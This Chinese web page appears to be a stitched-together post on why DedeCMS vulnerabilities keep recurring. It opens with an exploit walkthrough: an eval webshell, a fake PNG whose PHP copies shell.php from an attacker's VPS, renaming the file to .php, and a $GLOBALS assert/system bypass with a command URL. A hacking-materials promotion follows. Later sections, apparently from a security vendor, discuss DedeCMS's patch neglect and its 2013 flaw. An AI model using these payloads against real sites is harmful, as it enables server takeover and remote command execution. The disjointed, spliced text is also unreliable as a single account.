DedeCMS 漏洞为何屡修不止？

DedeCMS 漏洞为何屡修不止？

前言

刚发现Dedecms更新了发布版本，顺便测试一下之前的day有没有修复，突然想到了新的tricks去实现RCE。
文章发布的时候估计比较晚了，一直没时间写了。
利用

/uploads/dede/article_string_mix.php
/uploads/dede/article_template_rand.php
/uploads/dede/sys_task.php
......我发布的文档->>>>添加文档->>>>站内选择进行文件上传
/uploads/dede/content_list.php](http://dedecms.xyz:8066/uploads/dede/content_list.php?mid=1)
/uploads/dede/catalog_do.php?channelid=0&cid=0&dopost=addArchives



文件上传




在vps上起一个http的服务，端口设置为8016




远程服务器存放shell.php，文件内容为
<?php @eval ($_POST ['a']);?>准备一个图片格式的文件,文件内容为，这里我上传的文件名称为f.png
<? copy("http://192.168.225.40:8016/shell.php","shell.php");?>上传成功后可以看到上传的图片的位置




修改文件名为b.php




保存发现png图片已成功被更改，访问b.php,从远程vps下载了shell.php，当前目录下存在一个名称为shell.php的木马文件






利用webshell进行命令执行。




成功执行了命令
帮助网安学习，全套资料S信免费领取：
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集（含答案）
⑧ APP客户端安全检测指南（安卓+IOS）
思考

如果不考虑文件上传后缀名绕过方法，仅以上面图片格式的文件上传的话，那么无所谓上传的什么内容，因为本身来讲dede的代码中对文件内容是做的有校验的




所以文件内有两种绕过方法

• 正则绕过
  
• disable函数绕过
  

简单搜索了一下各个平台的文章，其实是有师傅正则绕过实现webshell的。第二点儿，disable函数绕过，往前几个版本，有兴趣的可以看一下源码，之前利用全局变量Globals绕过




代码内容
<?php
$a = $GLOBALS["_GET"];
$b = $GLOBALS["_GET"];
$a['test1']($b['test2'])
?>



命令执行
http://dedecms.org:8016/uploads/shell.php?test1=assert&&test2=system(%22ipconfig%22);




成功执行命令,且该命令执行为未授权命令执行。
所以在官方前几个版本中已经更新了，添加进了禁用方法




所以在绕过禁用方法上来讲更容易一点儿。所以在利用上这里利用了copy函数的特性，那么这里提醒一下，其它的函数当然也可以满足效果。

因为使用的人非常多

“有漏洞是小啊，但是得补啊！得重视产品安全 态度很重要！”这是我刚才在微博上回应朋友的一句话！
第一要说的是所有的程序都会有漏洞，有漏洞不可怕。
第二要说的是：没有绝对的安全，所以才有修不完的漏洞！但是有更安全
所以这个现象不是DedeCMS独有的，但是题主为什么是问DedeCMS 而不是PhpCMS，或者其他什么CMS呢？如果你比较关注wooyun或者关注dedecms官方 你会发现在过去得很长一端时间内DedeCMS都没有进行更新和维护！如图：


这些漏洞都被忽视了，很多细节都被公布、公开当时我们公司也多次报告过我们发现或监测到的漏洞报告给他们，他们的处理很简单：你发报告给他们的联系qq，他们还是接收。但是不回复、漏洞不修复。更加不用说发布感谢了［由此我还记得某“裤带”计划由于官方没有处理他们的收来的漏洞，而做出直接公布了漏洞这样不负责任的极端行为］，又有官方的不作为，受苦的就是使用dedecms的网站站长了！对于很多公布了细节或者正在被黑客利用的漏洞我们都会一时间发布临时补丁（如
漏洞预警 -  安全联盟官方论坛），不过关注我们的站长有限。DedeCMS市场基数又那么大，所以导致都是叫苦的站长。于是很多人留下了“DedeCMS不安全”的印象！
“祸不单行” 2013年6月7日可以载入史册的一天。因为DedeCMS可能是有史来最严重安全漏洞出现了，当天我看这个漏洞细节的时候，就断言这个漏洞将持续影响多年！我们立即发布了“红色警报”
【2013.06.07】网曝DedeCMS严重漏洞，SCANV发出红色警报 同时继续联系官方，希望官方能出补丁。这次可能是觉得问题太大了 官方还是在当天晚上发布补丁！后面我们持续跟踪了这个漏洞的被利用的情况，并通过数据挖掘分析了改漏洞在被曝光之前就被地下利用的情况。详细请参考：
0day被曝光之前 - /*///*/alert(1); - 知乎专栏
0day被爆后，网络世界会发生什么？

这次虽然dedecms紧急更新了补丁，但是漏洞的威力实在太大了，利用门槛太低、dedecms网站太多！导致“哀嚎遍野”，再次加深了“DedeCMS不安全”的印象！这里顺带要提到的，由于漏洞的特殊性，导致出现了“杀不死的90sec.php”出现了，也就是你查杀这个90sec.php 过段时间又出现了，起愿意这个漏洞是把恶意数据放到的数据库里，如果你不清理数据，导致你删除木马后又出现了。那个时候市面上所有网站杀毒程序都没有用，于是我们订制一款
DedeCMS顽固木马后门专杀工具 V 2.0 ［版本更新：20140228 ］ 解决这个问题，得到很多站长好评及支持！
不过突然有一天，大体是
http://updatenew.dedecms.com/base-v57/gb2312/20130715.file.txt 这个一下出了n个漏洞补丁及官方也在wooyun上积极确认漏洞修复了 如图：



一切看上去都很有好转，我们也觉得有希望，于是在
【2014.03.04】安全联盟报告DedeCMS多个安全漏洞[更新3.5]-安全联盟官方论坛 我们整理报告了多个安全漏洞，有2个是新发现的，他们陆续更新了，但是还有好几个是官方历史上遗留的而且被曝光的，可惜都没有进行处理！目前我们还在努力沟通希望官方能更新修复，这些漏洞在我们专杀工具里已经提供了解决方案！
在这里我想再提一下在官方不作为之前，还是比较重视安全的！依稀记得好像还有感谢过我们！dedecms在整体代码安全上除了用户中心（很多漏洞出现在用户中心），其他部分还是相对比较安全的！那时候大家都很和谐，随着官方不作为，这个印象越来越烂！
所以我想说的是：官方的对安全态度决定一切。用户在选择建站程序的时候，官方的对安全态度及更新频率是一个非常重要的指标！就我们观察PHPCMS一样存在很多严重的安全漏洞，但是给的印象要比dedecms好得多就是这个原因！
最后还有说明的是，官方是一方面，但是站长也是有责任的。很多网站站长平时不在意安全，不及时更新。也是导致网站各种被黑被安全联盟等拦截！“让安全成为网站的基础运营一部分”这才是当前站长要觉悟的道理！

因为他们的思想还停留在修复漏洞的层面。而非写出没有漏洞（或尽可能少）的代码！

主要原因还是那臭名昭著的dede自己实现的万恶的register global，导致各种变量覆盖从而控制流程和数据…